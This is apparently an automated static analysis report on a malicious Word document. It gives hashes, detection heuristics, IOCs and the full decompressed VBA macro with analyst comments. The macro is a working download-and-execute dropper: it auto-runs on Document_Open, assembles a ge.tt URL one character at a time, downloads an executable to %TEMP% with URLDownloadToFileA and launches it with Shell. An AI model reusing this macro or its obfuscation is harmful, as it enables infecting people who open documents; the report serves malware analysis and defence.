Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b2094f324fdd98d5…

MALICIOUS

Office (OLE)

37.5 KB Created: 2015-08-05 07:31:00 Authoring application: Microsoft Office Word First seen: 2015-10-03
MD5: c97d8946011adb303b8bed44cb5aee60 SHA-1: 3f745c55e5932d529a2e43fb5e1d888c89477b08 SHA-256: b2094f324fdd98d588ac6c4baacabb9db15ce6b87d2cbdfdd146b3e5da773ec2
278 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File — the fetch of the second stage via URLDownloadToFile additionally maps to T1105 Ingress Tool Transfer.

The sample is a malicious Word document whose VBA macros implement a download-and-execute dropper. `Document_Open` (auto-execution as soon as the document is opened with macros enabled) calls `PULAJZLO`, which assembles the download URL at runtime by character-by-character concatenation — `"http://"` + `ge.tt/api/1/files/49EhufL2/0/blob?down` + `".exe"`, i.e. `http://ge.tt/api/1/files/49EhufL2/0/blob?down.exe` — and the drop path `%TEMP%\scan_09889.exe` via `Environ("Temp")`. It then calls `URLDownloadToFileA` (Urlmon.dll) to fetch the second-stage payload and, if the file now exists (`Len(Dir(...)) > 0`), launches it with `Shell ..., vbNormalFocus`, so the payload runs with the privileges of the user who opened the document. The many repeated, unused `SettingsFile = Options.DefaultFilePath(...)` assignments and the no-op `AutoNew` calls are junk code, most likely inserted to pad the macro and defeat simple pattern matching; the split URL is also why the static URL extraction below does not list the download address. The second-stage binary was not retrieved during this static analysis, so its family and purpose are unknown.

Heuristics 8

  • ClamAV: Doc.Downloader.Generic-6754310-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-6754310-0
  • Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD
    Reference to URLDownloadToFile API
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
            Shell BHGNVZMM, vbNormalFocus
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
    Private Declare PtrSafe Sub URLDownloadToFileA Lib "Urlmon.dll" (ByVal XEDKENEE As Long, ByVal CXIHOWIQ As String, _
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro — auto-execution entry point: runs when the document is opened with macros enabled and immediately calls PULAJZLO (the download-and-execute routine), so this low-severity finding is the trigger for the critical ones above.
    Matched line in script
    Sub Document_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        BHGNVZMM = Environ("Temp") & "\" & "scan_09889"
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main Referenced by macro — note: this is the standard OOXML DrawingML namespace URI, not an indicator of compromise, and the string does not appear in the decompressed VBA source below (the label presumably reflects a document part rather than macro code). The actual download address (http://ge.tt/api/1/files/49EhufL2/0/blob?down.exe) is absent from this list because PULAJZLO builds it at runtime from single-character fragments; treat that runtime-assembled URL and the drop path %TEMP%\scan_09889.exe as the IOCs.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11670 bytes
SHA-256: 73bf1bead8f569a23486bf61afb5138516e8986a34ec4de0719e3d2cbc4fd652
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

' Declaration of the Win32 download primitive used by PULAJZLO (below).
' URLDownloadToFileA (urlmon.dll) fetches a URL straight into a local file; the
' randomised parameter names are noise and carry no meaning. The 64-bit branch keeps
' the pointer-sized first and last parameters As Long rather than LongPtr; the caller
' passes 0 for both (URLDownloadToFileA 0, url, path, 0, 0), so the mismatch most
' likely does not break the call in practice — TODO confirm on 64-bit Office.
#If Win64 Then

Private Declare PtrSafe Sub URLDownloadToFileA Lib "Urlmon.dll" (ByVal XEDKENEE As Long, ByVal CXIHOWIQ As String, _
    ByVal HZCTHZMF As String, _
    ByVal PRQBAYQD As Long, ByVal KVPRWCHK As Long)

#Else

' 32-bit Office: same signature without PtrSafe.
Private Declare Sub URLDownloadToFileA Lib "Urlmon.dll" (ByVal XEDKENEE As Long, ByVal CXIHOWIQ As String, _
    ByVal HZCTHZMF As String, _
    ByVal PRQBAYQD As Long, ByVal KVPRWCHK As Long)

#End If

' No-op filler routine. SettingsFile is computed and never read, and Order is a fresh
' local that is always "" and is therefore always set to "1" — nothing escapes this Sub.
' PULAJZLO calls it four times between the real steps, presumably to pad the macro and
' muddy heuristic matching. NOTE(review): AutoNew is also a Word auto-macro name (it fires
' when a new document is created from this template); here that would only run this no-op.
Sub AutoNew()
    Dim SettingsFile As String
    Dim Order As String
    Dim rRecNo As Range   ' declared, never used

    ' Word startup folder + "\Settings.ini": computed, never read.
    SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\Settings.ini"
    
    If Order = "" Then
    Order = 1
    End If

End Sub

' Auto-execution entry point: Word runs this as soon as the document is opened with
' macros enabled. Everything except the final call is filler; the download-and-execute
' logic lives in PULAJZLO.
Sub Document_Open()

' Not declared in this Sub and the module shows no Option Explicit, so this is an
' implicit Variant; computed and never read.
SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\Settings.ini"

    Dim sdfsd As String

    SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\Settings.ini"
    SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\Settings.ini"

    sdfsd = 15   ' junk assignment, never read

    ' Hand off to the dropper routine.
    PULAJZLO
End Sub

' Download-and-execute routine (called from Document_Open).
' Net effect once the filler is stripped:
'   url  = "http://" & "ge.tt/api/1/files/49EhufL2/0/blob?down" & ".exe"
'   path = Environ("Temp") & "\scan_09889" & ".exe"
'   URLDownloadToFileA 0, url, path, 0, 0
'   If the file now exists, Shell path (runs with the current user's privileges).
' The scheme and the ".exe" suffixes are appended one character at a time, so neither
' "http://" nor the full address exists as a contiguous string in the module — which is
' presumably why static URL extraction on this sample does not list the download address.
' Every "SettingsFile = Options.DefaultFilePath(...)" line and every AutoNew call is dead
' filler interleaved with the real steps. MUUXZXSB, MUUXZXSB0, BHGNVZMM and SettingsFile
' are not declared here (no Option Explicit visible), so they are implicit Variants.
Sub PULAJZLO()

SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\qrgrgerg.ini"   ' filler

       
    Dim Order As String
    Dim rRecNo As Range   ' declared, never used

    SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\Settings.ini"   ' filler

    If Order = "" Then
    Order = 1
    End If

    ' Host and path of the second stage (scheme and ".exe" are added below).
    MUUXZXSB = "ge.tt/api/1/files/49EhufL2/0/blob?down"
    ' Drop location: %TEMP%\scan_09889 (".exe" is appended below).
    BHGNVZMM = Environ("Temp") & "\" & "scan_09889"


    SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\qrgrgerg.ini"   ' filler

    If Order = "" Then
    Order = 1
    End If
    
    ' Build "http://" one character at a time, with filler between the steps.
    MUUXZXSB0 = "h"
    MUUXZXSB0 = MUUXZXSB0 + "t"
    SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\qrgrgerg.ini"
    MUUXZXSB0 = MUUXZXSB0 + "t"
    SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\qrgrgerg.ini"
    MUUXZXSB0 = MUUXZXSB0 + "p"
    SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\qrgrgerg.ini"
    MUUXZXSB0 = MUUXZXSB0 + ":"
    SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\qrgrgerg.ini"
    MUUXZXSB0 = MUUXZXSB0 + "/"
    SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\qrgrgerg.ini"
    MUUXZXSB0 = MUUXZXSB0 + "/"
    SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\qrgrgerg.ini"
    ' Now "http://ge.tt/api/1/files/49EhufL2/0/blob?down".
    MUUXZXSB0 = MUUXZXSB0 + MUUXZXSB

    SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\Settings.ini"   ' filler

    ' Append ".exe" -> "http://ge.tt/api/1/files/49EhufL2/0/blob?down.exe".
    MUUXZXSB0 = MUUXZXSB0 + "."
    SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\qrgrgerg.ini"
    MUUXZXSB0 = MUUXZXSB0 + "e"
    SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\qrgrgerg.ini"
    MUUXZXSB0 = MUUXZXSB0 + "x"
    SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\qrgrgerg.ini"
    MUUXZXSB0 = MUUXZXSB0 + "e"

    AutoNew   ' no-op filler

    ' Append ".exe" to the drop path -> %TEMP%\scan_09889.exe.
    BHGNVZMM = BHGNVZMM + "."
    SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\qrgrgerg.ini"
    BHGNVZMM = BHGNVZMM + "e"
    SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\qrgrgerg.ini"
    BHGNVZMM = BHGNVZMM + "x"
    SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\qrgrgerg.ini"
    BHGNVZMM = BHGNVZMM + "e"
    SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\qrgrgerg.ini"

    AutoNew   ' no-op filler

    SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\qrgrgerg.ini"   ' filler

    ' Fetch the second stage: URLDownloadToFileA(NULL, url, path, 0, NULL).
    ' The return value is discarded, hence the existence check below.
    URLDownloadToFileA 0, MUUXZXSB0, _
    BHGNVZMM, 0, 0

    SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\qrgrgerg.ini"   ' filler

    AutoNew   ' no-op filler

    ' Only execute if the download actually produced a file.
    If Len(Dir(BHGNVZMM)) > 0 Then
    AutoNew
        ' Launch the dropped executable in a normal, focused window.
        Shell BHGNVZMM, vbNormalFocus
        SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\qrgrgerg.ini"
    End If

End Sub


Attribute VB_Name = "NewMacros"
' Empty recorded-macro stub in the NewMacros module (only the macro recorder's
' comment header, no statements). Inert on its own and never called from ThisDocument.
Sub kudi()
'
' kudi Macro
'
'

End Sub

' Processing file: /opt/analyzer/scan_staging/157b325715544436ab42fea0f160fd4a.bin
' ===============================================================================
' Module streams:
' NOTE(review): identifier names in this p-code dump do not match the decompressed source
' above (e.g. the Declare appears as "PRQBAYQD Lib "rRecNo"", AutoNew as "Sub Range()",
' Document_Open as "Sub BHGNVZMM()" and PULAJZLO as "Sub MUUXZXSB0()"), so the names below
' should not be treated as authoritative — this looks like either a name-table resolution
' artifact of the disassembler or a scrambled identifier table. The string literals
' ("ge.tt/...", "Temp", "scan_09889", "\qrgrgerg.ini", "\Settings.ini") and the call
' sequence (five-argument download call -> Len(Dir()) > 0 -> two-argument call matching the
' Shell line) do agree with the source, which suggests the source is faithful to the compiled
' p-code (no sign of VBA stomping).
' Macros/VBA/ThisDocument - 6594 bytes
' Line #0:
' Line #1:
' 	LbMark 
' 	Ld Project1 
' 	LbIf 
' Line #2:
' Line #3:
' 	LineCont 0x0008 12 00 04 00 17 00 04 00
' 	FuncDefn (Private Declare PtrSafe Sub PRQBAYQD Lib "rRecNo" (ByVal KVPRWCHK As Long, ByVal Urlmon.dll As String, ByVal AutoNew As String, ByVal SettingsFile As Long, ByVal Order As Long))
' Line #4:
' Line #5:
' 	LbMark 
' 	LbElse 
' Line #6:
' Line #7:
' 	LineCont 0x0008 11 00 04 00 16 00 04 00
' 	FuncDefn (Private Declare Sub PRQBAYQD Lib "rRecNo" (ByVal KVPRWCHK As Long, ByVal Urlmon.dll As String, ByVal AutoNew As String, ByVal SettingsFile As Long, ByVal Order As Long))
' Line #8:
' Line #9:
' 	LbMark 
' 	LbEndIf 
' Line #10:
' Line #11:
' 	FuncDefn (Sub Range())
' Line #12:
' 	Dim 
' 	VarDefn Options (As String)
' Line #13:
' 	Dim 
' 	VarDefn DefaultFilePath (As String)
' Line #14:
' 	Dim 
' 	VarDefn wdStartupPath (As Document_Open)
' Line #15:
' Line #16:
' 	Ld MUUXZXSB 
' 	Ld sdfsd 
' 	ArgsMemLd PULAJZLO 0x0001 
' 	LitStr 0x000D "\Settings.ini"
' 	Concat 
' 	St Options 
' Line #17:
' Line #18:
' 	Ld DefaultFilePath 
' 	LitStr 0x0000 ""
' 	Eq 
' 	IfBlock 
' Line #19:
' 	LitDI2 0x0001 
' 	St DefaultFilePath 
' Line #20:
' 	EndIfBlock 
' Line #21:
' Line #22:
' 	EndSub 
' Line #23:
' Line #24:
' 	FuncDefn (Sub BHGNVZMM())
' Line #25:
' Line #26:
' 	Ld MUUXZXSB 
' 	Ld sdfsd 
' 	ArgsMemLd PULAJZLO 0x0001 
' 	LitStr 0x000D "\Settings.ini"
' 	Concat 
' 	St Options 
' Line #27:
' Line #28:
' 	Dim 
' 	VarDefn Environ (As String)
' Line #29:
' Line #30:
' 	Ld MUUXZXSB 
' 	Ld sdfsd 
' 	ArgsMemLd PULAJZLO 0x0001 
' 	LitStr 0x000D "\Settings.ini"
' 	Concat 
' 	St Options 
' Line #31:
' 	Ld MUUXZXSB 
' 	Ld sdfsd 
' 	ArgsMemLd PULAJZLO 0x0001 
' 	LitStr 0x000D "\Settings.ini"
' 	Concat 
' 	St Options 
' Line #32:
' Line #33:
' 	LitDI2 0x000F 
' 	St Environ 
' Line #34:
' Line #35:
' 	ArgsCall MUUXZXSB0 0x0000 
' Line #36:
' 	EndSub 
' Line #37:
' Line #38:
' 	FuncDefn (Sub MUUXZXSB0())
' Line #39:
' Line #40:
' 	Ld MUUXZXSB 
' 	Ld sdfsd 
' 	ArgsMemLd PULAJZLO 0x0001 
' 	LitStr 0x000D "\qrgrgerg.ini"
' 	Concat 
' 	St Options 
' Line #41:
' Line #42:
' Line #43:
' 	Dim 
' 	VarDefn DefaultFilePath (As String)
' Line #44:
' 	Dim 
' 	VarDefn wdStartupPath (As Document_Open)
' Line #45:
' Line #46:
' 	Ld MUUXZXSB 
' 	Ld sdfsd 
' 	ArgsMemLd PULAJZLO 0x0001 
' 	LitStr 0x000D "\Settings.ini"
' 	Concat 
' 	St Options 
' Line #47:
' Line #48:
' 	Ld DefaultFilePath 
' 	LitStr 0x0000 ""
' 	Eq 
' 	IfBlock 
' Line #49:
' 	LitDI2 0x0001 
' 	St DefaultFilePath 
' Line #50:
' 	EndIfBlock 
' Line #51:
' Line #52:
' 	LitStr 0x0026 "ge.tt/api/1/files/49EhufL2/0/blob?down"
' 	St Shell 
' Line #53:
' 	LitStr 0x0004 "Temp"
' 	ArgsLd _B_var_SettingsFile 0x0001 
' 	LitStr 0x0001 "\"
' 	Concat 
' 	LitStr 0x000A "scan_09889"
' 	Concat 
' 	St vbNormalFocus 
' Line #54:
' Line #55:
' Line #56:
' 	Ld MUUXZXSB 
' 	Ld sdfsd 
' 	ArgsMemLd PULAJZLO 0x0001 
' 	LitStr 0x000D "\qrgrgerg.ini"
' 	Concat 
' 	St Options 
' Line #57:
' Line #58:
' 	Ld DefaultFilePath 
' 	LitStr 0x0000 ""
' 	Eq 
' 	IfBlock 
' Line #59:
' 	LitDI2 0x0001 
' 	St DefaultFilePath 
' Line #60:
' 	EndIfBlock 
' Line #61:
' Line #62:
' 	LitStr 0x0001 "h"
' 	St id_0258 
' Line #63:
' 	Ld id_0258 
' 	LitStr 0x0001 "t"
' 	Add 
' 	St id_0258 
' Line #64:
' 	Ld MUUXZXSB 
' 	Ld sdfsd 
' 	ArgsMemLd PULAJZLO 0x0001 
' 	LitStr 0x000D "\qrgrgerg.ini"
' 	Concat 
' 	St Options 
' Line #65:
' 	Ld id_0258 
' 	LitStr 0x0001 "t"
' 	Add 
' 	St id_0258 
' Line #66:
' 	Ld MUUXZXSB 
' 	Ld sdfsd 
' 	ArgsMemLd PULAJZLO 0x0001 
' 	LitStr 0x000D "\qrgrgerg.ini"
' 	Concat 
' 	St Options 
' Line #67:
' 	Ld id_0258 
' 	LitStr 0x0001 "p"
' 	Add 
' 	St id_0258 
' Line #68:
' 	Ld MUUXZXSB 
' 	Ld sdfsd 
' 	ArgsMemLd PULAJZLO 0x0001 
' 	LitStr 0x000D "\qrgrgerg.ini"
' 	Concat 
' 	St Options 
' Line #69:
' 	Ld id_0258 
' 	LitStr 0x0001 ":"
' 	Add 
' 	St id_0258 
' Line #70:
' 	Ld MUUXZXSB 
' 	Ld sdfsd 
' 	ArgsMemLd PULAJZLO 0x0001 
' 	LitStr 0x000D "\qrgrgerg.ini"
' 	Concat 
' 	St Options 
' Line #71:
' 	Ld id_0258 
' 	LitStr 0x0001 "/"
' 	Add 
' 	St id_0258 
' Line #72:
' 	Ld MUUXZXSB 
' 	Ld sdfsd 
' 	ArgsMemLd PULAJZLO 0x0001 
' 	LitStr 0x000D "\qrgrgerg.ini"
' 	Concat 
' 	St Options 
' Line #73:
' 	Ld id_0258 
' 	LitStr 0x0001 "/"
' 	Add 
' 	St id_0258 
' Line #74:
' 	Ld MUUXZXSB 
' 	Ld sdfsd 
' 	ArgsMemLd PULAJZLO 0x0001 
' 	LitStr 0x000D "\qrgrgerg.ini"
' 	Concat 
' 	St Options 
' Line #75:
' 	Ld id_0258 
' 	Ld Shell 
' 	Add 
' 	St id_0258 
' Line #76:
' Line #77:
' 	Ld MUUXZXSB 
' 	Ld sdfsd 
' 	ArgsMemLd PULAJZLO 0x0001 
' 	LitStr 0x000D "\Settings.ini"
' 	Concat 
' 	St Options 
' Line #78:
' Line #79:
' 	Ld id_0258 
' 	LitStr 0x0001 "."
' 	Add 
' 	St id_0258 
' Line #80:
' 	Ld MUUXZXSB 
' 	Ld sdfsd 
' 	ArgsMemLd PULAJZLO 0x0001 
' 	LitStr 0x000D "\qrgrgerg.ini"
' 	Concat 
' 	St Options 
' Line #81:
' 	Ld id_0258 
' 	LitStr 0x0001 "e"
' 	Add 
' 	St id_0258 
' Line #82:
' 	Ld MUUXZXSB 
' 	Ld sdfsd 
' 	ArgsMemLd PULAJZLO 0x0001 
' 	LitStr 0x000D "\qrgrgerg.ini"
' 	Concat 
' 	St Options 
' Line #83:
' 	Ld id_0258 
' 	LitStr 0x0001 "x"
' 	Add 
' 	St id_0258 
' Line #84:
' 	Ld MUUXZXSB 
' 	Ld sdfsd 
' 	ArgsMemLd PULAJZLO 0x0001 
' 	LitStr 0x000D "\qrgrgerg.ini"
' 	Concat 
' 	St Options 
' Line #85:
' 	Ld id_0258 
' 	LitStr 0x0001 "e"
' 	Add 
' 	St id_0258 
' Line #86:
' Line #87:
' 	ArgsCall Range 0x0000 
' Line #88:
' Line #89:
' 	Ld vbNormalFocus 
' 	LitStr 0x0001 "."
' 	Add 
' 	St vbNormalFocus 
' Line #90:
' 	Ld MUUXZXSB 
' 	Ld sdfsd 
' 	ArgsMemLd PULAJZLO 0x0001 
' 	LitStr 0x000D "\qrgrgerg.ini"
' 	Concat 
' 	St Options 
' Line #91:
' 	Ld vbNormalFocus 
' 	LitStr 0x0001 "e"
' 	Add 
' 	St vbNormalFocus 
' Line #92:
' 	Ld MUUXZXSB 
' 	Ld sdfsd 
' 	ArgsMemLd PULAJZLO 0x0001 
' 	LitStr 0x000D "\qrgrgerg.ini"
' 	Concat 
' 	St Options 
' Line #93:
' 	Ld vbNormalFocus 
' 	LitStr 0x0001 "x"
' 	Add 
' 	St vbNormalFocus 
' Line #94:
' 	Ld MUUXZXSB 
' 	Ld sdfsd 
' 	ArgsMemLd PULAJZLO 0x0001 
' 	LitStr 0x000D "\qrgrgerg.ini"
' 	Concat 
' 	St Options 
' Line #95:
' 	Ld vbNormalFocus 
' 	LitStr 0x0001 "e"
' 	Add 
' 	St vbNormalFocus 
' Line #96:
' 	Ld MUUXZXSB 
' 	Ld sdfsd 
' 	ArgsMemLd PULAJZLO 0x0001 
' 	LitStr 0x000D "\qrgrgerg.ini"
' 	Concat 
' 	St Options 
' Line #97:
' Line #98:
' 	ArgsCall Range 0x0000 
' Line #99:
' Line #100:
' 	Ld MUUXZXSB 
' 	Ld sdfsd 
' 	ArgsMemLd PULAJZLO 0x0001 
' 	LitStr 0x000D "\qrgrgerg.ini"
' 	Concat 
' 	St Options 
' Line #101:
' Line #102:
' 	LineCont 0x0004 05 00 04 00
' 	LitDI2 0x0000 
' 	Ld id_0258 
' 	Ld vbNormalFocus 
' 	LitDI2 0x0000 
' 	LitDI2 0x0000 
' 	ArgsCall PRQBAYQD 0x0005 
' Line #103:
' Line #104:
' 	Ld MUUXZXSB 
' 	Ld sdfsd 
' 	ArgsMemLd PULAJZLO 0x0001 
' 	LitStr 0x000D "\qrgrgerg.ini"
' 	Concat 
' 	St Options 
' Line #105:
' Line #106:
' 	ArgsCall Range 0x0000 
' Line #107:
' Line #108:
' 	Ld vbNormalFocus 
' 	ArgsLd Dir 0x0001 
' 	FnLen 
' 	LitDI2 0x0000 
' 	Gt 
' 	IfBlock 
' Line #109:
' 	ArgsCall Range 0x0000 
' Line #110:
' 	Ld vbNormalFocus 
' 	Ld id_025C 
' 	ArgsCall id_025A 0x0002 
' Line #111:
' 	Ld MUUXZXSB 
' 	Ld sdfsd 
' 	ArgsMemLd PULAJZLO 0x0001 
' 	LitStr 0x000D "\qrgrgerg.ini"
' 	Concat 
' 	St Options 
' Line #112:
' 	EndIfBlock 
' Line #113:
' Line #114:
' 	EndSub 
' Line #115:
' Macros/VBA/NewMacros - 1023 bytes
' Line #0:
' 	FuncDefn (Sub CXIHOWIQ())
' Line #1:
' 	QuoteRem 0x0000 0x0000 ""
' Line #2:
' 	QuoteRem 0x0000 0x000B " kudi Macro"
' Line #3:
' 	QuoteRem 0x0000 0x0000 ""
' Line #4:
' 	QuoteRem 0x0000 0x0000 ""
' Line #5:
' Line #6:
' 	EndSub